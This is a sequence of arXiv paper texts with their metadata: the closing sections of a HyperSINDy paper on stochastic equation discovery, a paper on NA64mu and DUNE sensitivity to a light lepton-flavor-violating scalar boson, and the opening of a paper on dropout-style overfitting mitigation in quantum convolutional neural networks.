Moreover, although the diffusion term is not directly comparable with HyperSINDy's representation of stochasticity (coefficient noise), we may numerically estimate drift and diffusion coefficients from HyperSINDy's simulated trajectories. Specifically, we may estimate the first two Kramers-Moyal (K-M) coefficients, which derive from a Taylor expansion of the master equation (and from which the Fokker-Planck equation derives), and which fully describe the Markovian dynamics. Notably, HyperSINDy captures the appropriate deterministic (drift) and stochastic (diffusion) behavior of the system, recapitulating the state-dependence of these terms as seen in the original system - even performing favorably compared to stochastic SINDy in this setting. Figure 3: **Recovering drift and diffusion behavior in the stochastic Lotka-Volterra model.** K-M coefficients computed on sample trajectories from each of the three models (Euler-Maruyama integration, \(\Delta t=0.01\)). From left to right: the ground truth SDE, the HyperSINDy-discovered system, and the Stochastic SINDy-discovered system. ### High Dimensional Stochastic Discovery Lastly, we assess HyperSINDy's capacity for Bayesian inference/stochastic modeling for high dimensional stochastic systems, which are not amenable to existing analytical SDE discovery methods (e.g., (Boninsegna et al., 2018; Callaham et al., 2021)). Thus, we simulate a stochastic version of the Lorenz-96 system using: \[\dot{x}_{i}=F_{i}+x_{i+1}x_{i-1}-x_{i-2}x_{i-1}-x_{i} \tag{12}\] for \(i=1,...,10\) where \(x_{-1}=x_{9}\), \(x_{0}=x_{10}\), and \(x_{11}=x_{1}\). We iteratively sample each \(F_{i}\) from a normal distribution: \(F_{i}\sim\mathcal{N}(8,10)\). Refer to Fig. 4 for the full results. HyperSINDy correctly identifies all terms in the system, while also correctly learning a high variance coefficient exclusively for the forcing terms, \(F_{i}\). In addition, HyperSINDy produces sample trajectories that match the stochastic dynamical behavior of ground truth sample trajectories. ## 5 Discussion We have provided an overview of HyperSINDy, a neural network-based approach to sparse equation discovery for stochastic dynamics. Importantly, HyperSINDy is unique in its ability to provide analytical representations and UQ in the setting of high-dimensional stochastic dynamics. The present work represents a proof of concept for this architecture. We envision numerous future directions for extending the algorithmic and theoretical aspects of HyperSINDy - e.g., evaluation in the context of other noise types and with respect to convergence in the continuous limit. Moreover, while we employ a fairly straightforward implementation of SINDy, numerous developments of the SINDy framework (Kaptanoglu et al., 2022) may be smoothly incorporated into the HyperSINDy architecture. Finally, the integration of SINDy into a neural network framework paves the way for future developments that incorporate advances in probabilistic machine learning with interpretable equation discovery. Figure 4: **10D Stochastic Lorenz-96**. A sample test trajectory with \(\sigma=10\) (top) and sample HyperSINDy trajectory (middle) after training on a dataset with \(\sigma=10\). The bottom boxes show the mean and standard deviation of coefficients in the discovered governing equations (cf. 12).
2306.07405
Sensitivity potential to a light flavor-changing scalar boson with DUNE and NA64$μ$
In this work, we report on the sensitivity potential of complementary muon-on-target experiments to new physics using a scalar boson benchmark model associated with charged lepton flavor violation. The NA64$\mu$ experiment at CERN uses a 160-GeV energy muon beam with an active target to search for excess events with missing energy and momentum as a probe of new physics. At the same time, the proton beam at Fermilab, which is used to produce the neutrino beam for the Deep Underground Neutrino Experiment (DUNE) will also produce a high-intensity muon beam dumped in an absorber. Combined with the liquid Argon Near Detector, the system could be used to search for similar scalar boson particles with a lower energy but higher intensity beam. We find that both NA64$\mu$ and DUNE could cover new, unexplored parts of the parameter space of the same benchmark model, providing a complementary way to search for new physics.
B. Radics, L. Molina-Bueno, L. Fields., H. Sieber, P. Crivelli
2023-06-12T20:16:29Z
http://arxiv.org/abs/2306.07405v1
# Sensitivity potential to a light flavor-changing scalar boson with DUNE and NA64\(\mu\) ###### Abstract In this work, we report on the sensitivity potential of complementary muon-on-target experiments to new physics using a scalar boson benchmark model associated with charged lepton flavor violation. The NA64\(\mu\) experiment at CERN uses a 160-GeV energy muon beam with an active target to search for excess events with missing energy and momentum as a probe of new physics. At the same time, the proton beam at Fermilab, which is used to produce the neutrino beam for the Deep Underground Neutrino Experiment (DUNE) will also produce a high-intensity muon beam dumped in an absorber. Combined with the liquid Argon Near Detector, the system could be used to search for similar scalar boson particles with a lower energy but higher intensity beam. We find that both NA64\(\mu\) and DUNE could cover new, unexplored parts of the parameter space of the same benchmark model, providing a complementary way to search for new physics. ## I Introduction Observations in cosmology and astrophysics imply the existence of a Dark Sector potentially containing new particles that could weakly couple to Standard Model (SM) particles [1]. Neutrino oscillations coupled with non-zero neutrino masses provide experimental evidence of lepton-flavor violation. Furthermore, the existing discrepancy between the measured [2] and expected [3; 4] values of the muon anomalous magnetic moment provides a strong motivation for new physics searches with muons [5]. Inspired by these developments, a certain class of new theories motivates the search for charged lepton flavor violation (CLFV), which is heavily suppressed in the Standard Model (SM). In the coming decades, a new generation of experiments will conduct experimental searches for CLFV [6; 7; 8; 9; 10; 11]. In parallel, next-generation long-baseline neutrino oscillation experiments [12; 13] will study neutrino oscillations and, at the same time, their beam lines will produce an intense muon beam that is dumped in an absorber. In this work we study the sensitivity potential of muon-on-target experiments to new physics using a CLFV benchmark model. The physics scenario was introduced in a recent work [14] and uses a light scalar boson associated with \(\mu-\tau\) conversion. While the previous work derived constraints from data in existing beam-dump experiments (LSND [15], NuTeV [16], CHARM [17]) and for the future SHiP experiment [18], here we focus on two further experiments: the coming neutrino experiment, DUNE [12], deploying a high-intensity beam from the Long-Baseline Neutrino Facility (LBNF) [19], and a fixed-target experiment, NA64\(\mu\) [20; 21], which searches for new physics with the high-energy muon beam from the CERN Super Proton Synchrotron (SPS) accelerator. Hence, we study new physics searches using two complementary muon-beam setups. Even though we focus on one particular benchmark model scenario, there are also other possibilities to probe hidden sectors with muon beams using similar techniques [22; 23; 24; 25; 26]. ## II Flavour-changing scalar with long lifetime The model proposed by [14] considers a new complex scalar field, \(\phi\), with a mass window \([m_{\tau}-m_{\mu},m_{\tau}+m_{\mu}]\) that couples to \((\mu,\tau)\). With such a mass range, long lifetimes can be achieved, with propagation distances on the order of tens of kilometers. 
The effective Lagrangian interaction terms describe the coupling of the new scalar field with leptons, \[\mathcal{L}_{\mathcal{I}}=\phi\bar{\mu}(g_{V}+g_{A}\gamma^{5})l+\phi^{*}\bar{l}(g_{V}^{*}-g_{A}^{*}\gamma^{5})\mu \tag{1}\] with vector and axial-vector couplings \(g_{V}\), \(g_{A}\). This model produces a benchmark parameter region explaining the muon \(g-2\) anomaly with a typical value of \(|g_{V}|\simeq 3\times 10^{-3}\), also used in this work. There are multiple production modes for \(\phi\) at beam-dump experiments: the direct electroweak process, heavy meson decay, and high-energy muons hitting a fixed target. In this work, we focus on the third case (the so-called \(\mu\)-on-target scenario). In this mode, muons pass through dense material and could produce the \(\phi\) boson via the exchange of a virtual photon with the nuclei of the target, \(\mu(p)N(P_{i})\rightarrow\tau(p^{\prime})\phi(k)N(P_{f})\). Once created, the bosons produce a missing energy signature or propagate long distances and may be detected in a detector downstream from the target. When the incoming beam energy is much higher than the particle mass, the double-differential cross-section of the \(2\to 3\) production process can be estimated using the equivalent photon approximation [27], \[\frac{d^{2}\sigma(p+P_{i}\to p^{\prime}+k+P_{f})}{dE_{\phi}d\cos\theta_{\phi}}=\frac{\alpha\chi}{\pi}\frac{E_{\mu}x\beta_{\phi}}{1-x}\frac{d\sigma(p+q\to p^{\prime}+k)}{d(p\cdot k)}\bigg{|}_{t=t_{\rm min}} \tag{2}\] where \(E_{\mu}\) is the initial muon energy, \(E_{\phi}\) is the energy and \(\theta_{\phi}\) the scattering angle of \(\phi\) with respect to the initial muon in the lab frame, \(x=E_{\phi}/E_{\mu}\), \(q=P_{i}-P_{f}\), \(t=-q^{2}\) is the momentum transfer, \(\alpha=1/137\) is the fine structure constant, \(\beta_{\phi}\) is the relativistic factor for \(\phi\), and \(\chi\) is the effective photon flux, defined as \[\chi=\int_{t_{\rm min}}^{t_{\rm max}}dt\frac{t-t_{\rm min}}{t^{2}}F^{2}(t) \tag{3}\] where \(F(t)=Z^{2}/(1+t/d)^{2}\) is the form factor with \(d=0.164\) GeV\({}^{2}A^{-2/3}\), and the limits are given in the appendix of [14]. We calculate the analytical expression for \(\chi\) using Mathematica [28] and obtain \[\chi=Z^{2}\left[\frac{t_{\rm min}}{t}+\frac{d+t_{\rm min}}{d+t}+\frac{d+2t_{\rm min}}{d}\ln\frac{t}{d+t}\right]_{t_{\rm min}}^{t_{\rm max}}. \tag{4}\] In Eq. 2, \(\sigma(p+q\to p^{\prime}+k)\) is the cross section for the \(2\to 2\) scattering process, \(\mu(p)\gamma(q)\rightarrow\tau(p^{\prime})\phi(k)\), \[\frac{d\sigma(p+q\to p^{\prime}+k)}{d(p\cdot k)}=\frac{|\bar{\mathcal{A}}_{2\to 2}|^{2}}{8\pi s^{2}} \tag{5}\] where \(|\bar{\mathcal{A}}|^{2}\) is the amplitude squared, which we calculate using the FeynCalc tools [29] for Mathematica. 
We obtain the following expression for the \((\mu,\tau)\) case, \[|\bar{\mathcal{A}}_{2\to 2}|^{2}=-\frac{e^{2}m_{\mu}m_{\tau}(g_{A}g_{A}^{*}-g_{V}g_{V}^{*})}{(m_{\mu}^{2}-s)^{2}(m_{\tau}^{2}-u)^{2}}\times \tag{6}\] \[\times\left[m_{\mu}^{4}(m_{\phi}^{2}+u)+2m_{\mu}^{3}m_{\tau}(m_{\tau}^{2}-u)\right.\] \[+m_{\mu}^{2}\left(m_{\tau}^{4}-2m_{\phi}^{2}s-2m_{\tau}^{2}u+u(u-2s)\right)\] \[+2m_{\mu}m_{\tau}s(u-m_{\tau}^{2})+s\left(m_{\phi}^{2}s+m_{\tau}^{4}-2m_{\tau}^{2}u+u(s+u)\right)]\] where \(e=\sqrt{4\pi\alpha}\), \(m_{\phi}\), \(m_{\tau}\), \(m_{\mu}\) are the masses of the boson \(\phi\), \(\tau\) and \(\mu\), respectively, and \(s\), \(u\) are the Mandelstam variables, which can be evaluated in the laboratory frame, \[s=(p+q)^{2}\simeq m_{\mu}^{2}-\frac{u-m_{\tau}^{2}}{1-x} \tag{7}\] \[u=(p-k)^{2}\simeq-E_{\mu}^{2}x\theta_{\phi}^{2}-\frac{1-x}{x}m_{\phi}^{2}+(1-x)m_{\mu}^{2}.\] To calculate the lifetime of the \(\phi\) boson, \(\tau_{\phi}\), we use Equations 3.2-3.5 in [14] adapted to the \((\mu,\tau)\) case. We calculate the cross-section and decay width using the GNU Scientific Library [30]. The production cross-section for the \(\phi\) boson as a function of the incoming lepton energy is shown in Fig. 1. Assuming \(m_{\phi}\simeq m_{\tau}\), the threshold for the production is given by \(E_{\mu}>[(2m_{\tau}+m_{N})^{2}-m_{\mu}^{2}-m_{N}^{2}]/2m_{N}\simeq 3.8\) GeV for Pb, above which the cross-section steeply rises. In the following, we use the corresponding muon beam flux of each experiment (NA64\(\mu\) and DUNE) to evaluate the expressions for the \(\phi\) production via the variables defined in Eq. 7. Figure 1: Production cross-section of the \(\phi\) boson, with mass \(m_{\phi}=m_{\tau}\) and coupling constant \(|g_{V}|=3\times 10^{-3}\), as a function of the incoming muon energy. ## III \(\mu\)-on-target experiments We estimate the projected sensitivity of an experiment by finding the pair of parameter values \((g_{V},m_{\phi})\) for which a given number of signal events, \(N_{\phi}\), is produced either directly in the target (NA64\(\mu\)) or in the detector (DUNE), as explained later, after a given exposure. In this work we exploit the \(\phi\) boson production process using different and complementary \(\mu\)-on-target experiments: NA64\(\mu\), with the active-dump technique, compared to proton beam-dump experiments such as the DUNE neutrino experiment using the LBNF proton beam. Although the underlying production mechanism is the same, the two techniques differ in the flux of the muon beam, \(\Phi_{\mu}(E)\), the target thickness, and the materials. In a general case, \(\phi\) bosons are generated by the \(\mu\)-on-target process, and, after production, a fraction of them decay inside a detector volume and can be detected. 
The number of such signal events is \[N_{\phi}=\int dE_{\phi}\Phi_{\phi}(E_{\phi})\times\frac{l_{\rm det}}{\gamma\beta c \tau_{\phi}}, \tag{8}\] where \(\gamma\) is the relativistic Lorentz-factor, and \(\Phi_{\phi}(E_{\phi})\) is the flux of the \(\phi\) boson at the detector, estimated as \[\Phi_{\phi}(E_{\phi})=\int dE\Phi_{\mu}(E)\times \tag{9}\] \[\int_{E_{\rm min}}^{E}dE_{l}\frac{n_{A}}{-dE/dl}\int_{0}^{\theta_ {\rm det}}d\theta_{\phi}\sin\theta_{\phi}\frac{d^{2}\sigma(E_{l},E_{\phi})}{dE _{\phi}d\cos\theta_{\phi}}.\] Here, \(\Phi_{\mu}(E)\) is the flux of the muon beam as a function of energy, \(n_{A}\) is the number of target atoms per volume, \(E_{l}\) is the muon energy after traveling a length \(l\) in the target and losing energy according to the stopping power \(-dE/dl\), \(E_{\rm min}\) is the energy of the muon at the end of the target, and \(\theta_{\rm det}\) is the angular acceptance. In the next subsections we separately describe the two experimental scenarios and the assumptions in the derived sensitivity limits. ### NA64\(\mu\) scenario NA64\(\mu\) is a fixed-target experiment at CERN looking for new particles of Dark Matter and portal interactions produced in electromagnetic showers and coupled to muons. The experiment uses the secondary 160 GeV muons from the interactions of 400 GeV protons from the CERN SPS with a target. A set of beam scintillators and veto counters, low material-budget trackers and dipole magnets allow to precisely constrain the momentum of the incoming 160-GeV muons impinging on an active target. The main detector, where \(\phi\) may be produced, consists of an electromagnetic calorimeter with 40 \(X_{0}\) radiation length. Downstream, the detector is further equipped with veto counters and a \(\sim\)30-interaction length hadronic calorimeter. New particles could be produced by the muon beam scattering in the target and decay later to visible SM particles that could be seen by their signatures in a downstream detector. The current work is based on the detection of missing energy and momentum carried away by the produced hypothetical, long-lived \(\phi\) boson, leaving a scattered muon as experimental signature (the momentum of the scattered muon ranging between \(10-80\) GeV/c). The sensitivity in the search for the \(\phi\) boson is higher with respect to the beam-dump approach due to the lower power in the coupling strength without a decay vertex. Thus, in NA64\(\mu\) only the number of events at the production target needs to be estimated. Therefore, the number of events is given by \(N_{\phi}=\int dE_{\phi}\Phi_{\phi}(E_{\phi})\). Furthermore, the production target thickness is small and the muon energy loss can be neglected. As a result we use the following expression to estimate the \(\phi\) boson flux, \[\Phi_{\phi}(E_{\phi})=l_{\rm target}n_{A}\int dE\Phi_{\mu}(E)\times \tag{10}\] \[\int_{0}^{\theta_{\rm det}}d\theta_{\phi}\sin\theta_{\phi}\frac{ d^{2}\sigma(E,E_{\phi})}{dE_{\phi}d\cos\theta_{\phi}},\] where \(l_{\rm target}\) is the thickness of the target. There has been an extensive study of simulating and evaluating the production of Dark Matter particles with a muon beam at NA64 [26; 31; 32]. We use the same method in this work to estimate the sensitivity reach of the experiment. We assume a muon beam with a mean of 160 GeV energy and a width of 4.3 GeV hitting a lead target with a total data of \(\sim 3\times 10^{13}\) muons-on-target (MOT). 
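To illustrate how Eq. 10 can be evaluated in practice for such a thin active target, the sketch below numerically integrates a generic double-differential cross-section over the angular acceptance and a Gaussian 160-GeV beam profile; the placeholder cross-section, angular acceptance, and target parameters are illustrative assumptions and do not reproduce the model of Sec. II or the official NA64\(\mu\) projection.

```python
import numpy as np

# Illustrative constants for a lead active target (all values are assumptions for this sketch)
N_A = 6.022e23                        # Avogadro's number, 1/mol
rho_pb, A_pb = 11.35, 207.2           # lead density [g/cm^3] and molar mass [g/mol]
n_atoms = N_A * rho_pb / A_pb         # target atoms per cm^3
l_target = 100.0                      # cm, a 1-m-long active target
theta_det = 0.05                      # rad, assumed angular acceptance
mot = 3e13                            # muons on target

def d2sigma(E_mu, E_phi, theta):
    """Placeholder for d^2(sigma)/(dE_phi dcos theta) in cm^2/GeV.
    A toy, smoothly falling shape; the physical model of Sec. II should be used instead."""
    x = E_phi / E_mu
    if x >= 1.0:
        return np.zeros_like(theta)
    return 1e-38 * x * np.exp(-theta**2 / 1e-3)

def phi_flux(E_phi, E_mean=160.0, E_width=4.3, n_E=41, n_th=81):
    """Eq. 10: thin-target phi yield per muon and per unit E_phi, integrated numerically."""
    E_grid = np.linspace(E_mean - 3 * E_width, E_mean + 3 * E_width, n_E)
    beam = np.exp(-0.5 * ((E_grid - E_mean) / E_width) ** 2)
    beam /= np.trapz(beam, E_grid)                 # normalized beam energy spectrum
    th_grid = np.linspace(1e-4, theta_det, n_th)
    inner = np.array([np.trapz(np.sin(th_grid) * d2sigma(E, E_phi, th_grid), th_grid)
                      for E in E_grid])
    return l_target * n_atoms * np.trapz(beam * inner, E_grid)

E_phi_grid = np.linspace(10.0, 150.0, 50)
N_phi = mot * np.trapz([phi_flux(E) for E in E_phi_grid], E_phi_grid)
print(f"expected number of phi bosons (toy cross-section): {N_phi:.2e}")
```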
### DUNE/LBNF scenario The Deep Underground Neutrino Experiment is a next-generation, wide-energy-beam long-baseline neutrino experiment at Fermilab. It will use an intense (anti)neutrino beam that passes through a Near Detector at Fermilab and a Far Detector 1300 km away in South Dakota. The neutrino beam line of DUNE is the result of an exhaustive design and optimization effort [19]. The beam is produced by a 60-120 GeV proton beam hitting a graphite target, after which the produced pions and kaons decay to leptons and neutrinos in a \(\sim 220\)-m-long decay pipe. At the end of the pipe, a dedicated \(\sim 30\)-m-long stainless-steel structure acts as a beam dump to stop all muons 300 m upstream from the Near Detector. We use the simulation of the neutrino beam production to trace particles along the beam axis. The muon flux used in the calculation is estimated from a dedicated tracking plane, which is located at the end of the decay pipe in the simulation. An example of the obtained muon energy spectrum is illustrated in Fig. 2. The peak of the spectrum is at \(E_{\mu}\simeq 2.5\) GeV; however, the long high-energy tail is responsible for the majority of the \(\phi\) boson production due to the rapid increase of the cross-section with the incoming lepton energy (see Fig. 1). In the lower-energy region the production rate is much smaller. From the neutrino flux simulation we estimate an integrated muon flux of \(\Phi_{\mu}\simeq 5\times 10^{19}\) muons for \(1.1\times 10^{21}\) protons-on-target (POT), corresponding to one year of data taking. In DUNE, a signal could be detected in the Near Detector from the decay of the \(\phi\) boson that was produced by the muons hitting the stainless-steel dump. We consider the decay channel \(\phi\rightarrow\mu^{+}\mu^{-}\nu_{\mu}\nu_{\tau}\) with a branching ratio of 17% [14], motivated by the dimuon results from NuTeV [16]. Possible backgrounds leading to a dimuon signature include deep inelastic scattering (DIS) and resonance production of mesons in charged-current (CC) muon-neutrino (\(\nu_{\mu}\)) interactions with a target nucleus. The mesons could decay in the semi-leptonic mode, producing an extra muon. In order to analyze such potential background processes we performed simulations with the GENIE [33] Monte Carlo (MC) event generator, which provides comprehensive neutrino interaction modeling in the \(E_{\nu}\sim 100\) MeV \(-\) few 100 GeV neutrino energy region, including quasi-elastic, resonance and DIS processes. Unlike the \(\phi\) boson decay, events with DIS or resonant meson production are accompanied by additional activity in the final state. Similarly to previous findings for NuTeV, after selecting low-multiplicity events with two muons, we found that these backgrounds could be completely suppressed in an MC simulation of 400 million neutrino interaction events on an Argon target (corresponding to \(\sim 5\) years of operation of DUNE at the nominal intensity). However, further studies are planned with a full detector simulation to get a detailed understanding of the possible bounds on the background rejection. ## IV Results We illustrate the sensitivity potential for the benchmark CLFV scenario with the complementary muon beams at NA64\(\mu\) and DUNE in Fig. 3. For both experiments, the double-differential cross-section in Eq. 
9 or 10 is evaluated given the energy spectra of each experiment, \(\Phi_{\mu}(E)\), and the kinematical limits on the final-state \(\phi\)-boson fractional energy, \(x\), which is constrained by the masses of the boson \(\phi\) and the \(\tau\). In the case of the NA64\(\mu\) experiment a total integrated muon flux of \(\sim 3\times 10^{13}\) MOT is achievable [20]. The time needed to accumulate the assumed total MOT is estimated to be \(\sim 100\) days. This conservative estimation is based on the CERN SPS delivering on average 3500 spills per day and \(2\times 10^{8}\) muons per spill. Benefiting from the unique combination of a 160-GeV muon beam with a missing-energy-and-momentum search, NA64\(\mu\) would be able to perform a competitive search for such a CLFV signal. Furthermore, the sensitivity reach critically depends on the length of the active target. We find that a 1-m-long target would already be able to explore a large part of the parameter space, \(g_{V}\geq 6\times 10^{-3}\). However, the experiment is highly modular and a possible optimization of the setup could enhance its potential further: a feasible option is to increase the target length to 5 meters, which would allow the \((g_{\mu}-2)\) preferred region to be completely covered and a variety of other new physics scenarios involving muons to be probed. We also find that already with \(10^{12}\) MOT and a \(\sim 3\)-m-long target the \(g_{V}\geq 10^{-2}\) parameter region can be covered. A detailed Monte Carlo simulation of an optimized setup will follow as a next step. For the DUNE experiment the \(\phi\)-boson production is driven by the high-end tail of the muon flux. Compared to NA64\(\mu\), the lower muon energies at DUNE and thus lower production cross-section are compensated by the more intense muon flux. Assuming 20 years of operation at nominal intensity, DUNE would be able to explore a significant part of the parameter space, reaching into the \(g_{V}\simeq 10^{-2}\) region and potentially improving the constraints from NuTeV. However, an optimization of the neutrino beam line could further enhance the contribution of high-energy muons in the flux and subsequently approach the \(g_{V}\leq 10^{-2}\) benchmark region. This scenario is partially motivated by a recent work exploring an alternative beam-dump operation mode to probe new physics with DUNE [34]. For comparison we also show the projected sensitivity for the same \(\mu\)-on-target mode calculated by [14] for CHARM, NuTeV and SHiP. Here we do not show the constraints or projected sensitivity limits derived for the direct electroweak and heavy meson decay processes, which were included in the previous work [14], since we focus only on the \(\mu\)-on-target scenario. In the case of SHiP, the assumed total data corresponds to \(2\times 10^{20}\) protons-on-target (POT). The worse sensitivity in DUNE compared to SHiP stems from the lower muon energies in the flux [35]. It is also noted that there are differences in the beam intensity between NA64\(\mu\) and SHiP. We assume a \(10^{12}\) POT per spill intensity at the CERN SPS in the case of the muon beam line used by NA64\(\mu\), while for SHiP the proton beam intensity is usually expected to be an order of magnitude higher. We note that a similar setup of NA64\(\mu\) is capable of searching for other new scalar particle candidates using the same muon beam [26]. In addition, the proposed Muon Missing Momentum (\(M^{3}\)) experiment at Fermilab [36] also plans to probe new physics with a dedicated muon beam. 
Finally, a number of experiments also have the potential to search for hidden-sector scalar particles, such as SHADOWS [37], HIKE [38], and ATLAS [39]. Figure 2: Energy spectrum of muons at the end of the decay pipe from the full DUNE neutrino beam line simulation [19], see explanation in the text. ## V Conclusions In summary, we present the sensitivity potential of two \(\mu\)-on-target experiments: NA64\(\mu\) and DUNE, as complementary modes of searching for new physics with muon beams. We find that both NA64\(\mu\) and DUNE have the potential to cover a significant portion of the benchmark model parameter space, \((m_{\phi},g_{V})\). NA64\(\mu\) with an optimized setup could probe the coupling parameter down to \(g_{V}\simeq 3\times 10^{-3}\), completely covering the muon \(g_{\mu}-2\) preferred region and thus providing a similar projected reach as SHiP. DUNE will also be able to cover unexplored parts of the parameter space, potentially improving on the obtained constraints from NuTeV. An optimization of the neutrino beam line, increasing the contribution from the high-energy tail, could allow to further enhance the sensitivity of DUNE. Although we use a given CLFV model as a benchmark in this work, we note that similar techniques can be used to study the sensitivity potential of experiments with muon beams to other physics scenarios. Beyond the \(g_{\mu}-2\) discrepancy and neutrino flavor oscillations, searches for Dark Sector particles are also motivated by the matter-antimatter asymmetry, the known Dark Matter abundance from astrophysical and cosmological observations, or by theoretical motivations strongly suggesting the existence of additional gauge groups weakly coupling to SM fields [1; 40]. ###### Acknowledgements. We gratefully acknowledge conversations with D. Harris. The work of LMB is supported by SNSF Grant No. 186158 (Switzerland), RyC-030551-I, and PID2021-123955NA-100 funded by MCIN/AEI/10.13039/501100011033/FEDER, UE (Spain).
2309.01829
A Post-Training Approach for Mitigating Overfitting in Quantum Convolutional Neural Networks
Quantum convolutional neural network (QCNN), an early application for quantum computers in the NISQ era, has been consistently proven successful as a machine learning (ML) algorithm for several tasks with significant accuracy. Derived from its classical counterpart, QCNN is prone to overfitting. Overfitting is a typical shortcoming of ML models that are trained too closely to the availed training dataset and perform relatively poorly on unseen datasets for a similar problem. In this work we study post-training approaches for mitigating overfitting in QCNNs. We find that a straightforward adaptation of a classical post-training method, known as neuron dropout, to the quantum setting leads to a significant and undesirable consequence: a substantial decrease in success probability of the QCNN. We argue that this effect exposes the crucial role of entanglement in QCNNs and the vulnerability of QCNNs to entanglement loss. Hence, we propose a parameter adaptation method as an alternative method. Our method is computationally efficient and is found to successfully handle overfitting in the test cases.
Aakash Ravindra Shinde, Charu Jain, Amir Kalev
2023-09-04T21:46:24Z
http://arxiv.org/abs/2309.01829v2
# Soft-Dropout: A Practical Approach for Mitigating Overfitting in Quantum Convolutional Neural Networks ###### Abstract Quantum convolutional neural network (QCNN), an early application for quantum computers in the NISQ era, has been consistently proven successful as a machine learning (ML) algorithm for several tasks with significant accuracy. Derived from its classical counterpart, QCNN is prone to overfitting. Overfitting is a typical shortcoming of ML models that are trained too closely to the availed training dataset and perform relatively poorly on unseen datasets for a similar problem. In this work we study the adaptation of one of the most successful overfitting mitigation methods, known as the (post-training) dropout method, to the quantum setting. We find that a straightforward implementation of this method in the quantum setting leads to a significant and undesirable consequence: a substantial decrease in success probability of the QCNN. We argue that this effect exposes the crucial role of entanglement in QCNNs and the vulnerability of QCNNs to entanglement loss. To handle overfitting, we propose a softer version of the dropout method. We find that the proposed method allows us to successfully handle overfitting in the test cases. ## I Introduction Quantum machine learning (QML) has shown great promise on several prototypes of NISQ devices, presenting significant accuracy over several different datasets, see e.g., [1; 2] and references therein. It has been proven effective even with a limited number of available qubits, not only on simulated devices but also when tested on noise-prone quantum information processing devices, a task that had seemed difficult in the case presented in [3]. As most QML models have been derived from classical machine learning (ML) models, with adaptations so that they can operate on quantum devices, these algorithms face challenges similar to those found in their classical counterparts. One of the setbacks of ML models, classical and quantum included, is overfitting, causing models to underperform on average when presented with external data outside the training set for the same problem. Due to its importance, the problem of overfitting has been studied extensively in the classical ML literature, and several methods have been proposed and implemented to mitigate it, see e.g., [4] and Sec. II for a brief overview. Very generally, there are two ways one can approach the problem of overfitting. In the first approach we combat overfitting before or during the training process. This can be done, for example, by data augmentation or regularization techniques [4]. Complementary to this approach, overfitting can be treated post-training by changing the trained parameters to compensate for it. One such method for handling overfitting in neural network (NN) architectures is neuron dropout [5]. In this method, a new NN is created from the trained NN by removing (dropping out) a few neurons from the network. Due to its simplicity and proven applicability in a wide range of NNs, dropout became one of the most popular techniques to handle overfitting in the classical ML paradigm. While pre-training methods can be effective to a certain extent, they may not fully eliminate the problem of overfitting since, during training, the model may learn patterns that are specific to the training data and may not generalize well. 
In contrast, post-training methods generally allow for a more comprehensive analysis of the trained model's behavior and performance, making it possible to fine-tune the models and improve generalization. In contrast to the classical setting, there has been much less investigation as to how to address the problem of overfitting in QML models. While pre-training methods such as data augmentation or early stopping may have been implemented in the QML setting, to the best of our knowledge there has been no systematic study of the problem of overfitting in QML models. In this paper, we study the problem of overfitting in QML models and propose a post-training method to mitigate it. Specifically, we focus on the dropout method as a deterrent for overfitting; for concreteness, and since it is one of the widely used QML architectures, we concentrate on quantum convolutional neural networks (QCNNs) [6]. As we discuss in more detail in the following sections, we find that a straightforward generalization of the dropout method to the quantum setting can cause QCNN models to lose their prediction capabilities on the _trained_ data, let alone improve overfitting. As we shall argue, this result can be traced back to the way QCNNs are designed and to the crucial role of entanglement in their performance and success. Therefore, we propose a new overfitting deterrent based on a "softer" version of the post-training dropout method, termed soft-dropout. This method, as we will show, provides excellent performance for suppressing overfitting in QCNNs for the tested cases. The paper is organized as follows: In Sec. II, we discuss the problem of overfitting and the classical techniques for mitigating it. In Sec. III we present the various techniques we tested and developed to mitigate overfitting in QCNNs. In Sec. IV we present our numerical experimental results using these techniques. We offer conclusions and outlook in Sec. V. ## II Overfitting and its mitigation in classical neural networks Before considering the problem of overfitting in the quantum setting, in this section we take a closer look at this problem as it is manifested in the classical setting and at the current methods for mitigating it [4]. Overfitting is one of the common problems in ML and statistical modeling, where a model performs exceptionally well on the training data but fails to generalize to new, unseen data. It occurs when the model learns the noise and random fluctuations in the training data in addition to the underlying patterns and relationships. When a model overfits the training data, it becomes too complex and captures the idiosyncrasies of the training data, leading to poor performance on any new data. In practice, overfitting is manifested as a relatively poor performance of a model, in terms of its prediction accuracy, on validation data. Therefore, model overfitting is a problem that undermines the very essence of the learning task, i.e., generalizability. For this reason, a lot of effort has been devoted to developing methods and techniques to handle overfitting and make sure that learning models are flexible enough and not overfitted to the training data. We briefly review some of the most popular techniques in what follows, see also [4] and references therein. Cross-validation is a pre-training technique used to assess the performance and robustness of a model. 
It involves splitting the data into multiple subsets or folds and training the model on different combinations of these subsets. By evaluating the model's performance on different folds, cross-validation helps estimate the model's ability to generalize to new data. It can be easily implemented in classical as well as quantum ML models (we have implemented it in our numerical experiments). Increasing the training data size by augmenting it can also help alleviate overfitting. Data augmentation techniques involve generating additional training samples by applying transformations, such as rotations, translations, or distortions, to the existing data. This introduces more variation and diversity, helping the model to generalize better. This method of avoiding overfitting is highly dependent on the availability of data and is easily transferable to QML, since it concerns the data preprocessing stage rather than the ML model itself and is taken into account during the experimental process. Regularization is another popular pre-training overfitting prevention technique. In general terms, it avoids overfitting by adding a penalty term to the loss function during training. In this way, regularization introduces a bias into the model, discouraging overly complex solutions. \(L1\) and \(L2\) regularization are commonly used methods. \(L1\) regularization (Lasso) adds the absolute value of the coefficients to the loss function, promoting sparsity. \(L2\) regularization (Ridge) adds the squared value of the coefficients, which tends to distribute the impact across all features. Overfitting can occur when the model has access to many irrelevant or redundant features. Feature selection techniques aim to identify and retain only the most informative and relevant features for model training. This can be done through statistical methods, such as univariate feature selection or recursive feature elimination, or using domain knowledge and expert intuition. Feature selection has been implemented in the QML setting and has proven to be useful [7]. In addition to the aforementioned methods, the complexity of a model plays a crucial role in determining the risk of overfitting. Simplifying the model architecture or reducing the number of parameters can mitigate overfitting. Techniques such as reducing the number of hidden layers, decreasing the number of neurons, or using simpler model architectures, like linear models or decision trees, can help control the complexity and prevent overfitting. Finally, we mention dropout. Dropout is a regularization technique specific to NNs. It is one of the most popular methods for mitigating overfitting in classical NNs due to its simplicity and performance [4; 5]. Dropout can be implemented in two ways: one during the training process, and the other after a trained model has been obtained. During training, dropout randomly disables a fraction of the neurons in each layer, forcing the network to learn redundant representations and reducing the reliance on specific neurons. For the post-training version of dropout, typically a few percent of the neurons are dropped at random from a trained NN. This process is repeated, with different realizations, until the least overfitted model is found. The dropout method is known to help prevent overfitting by making the network more globally robust and less sensitive to individual neurons [5]. In this work, we adjust the dropout method to the QCNN setting and experimentally test it. 
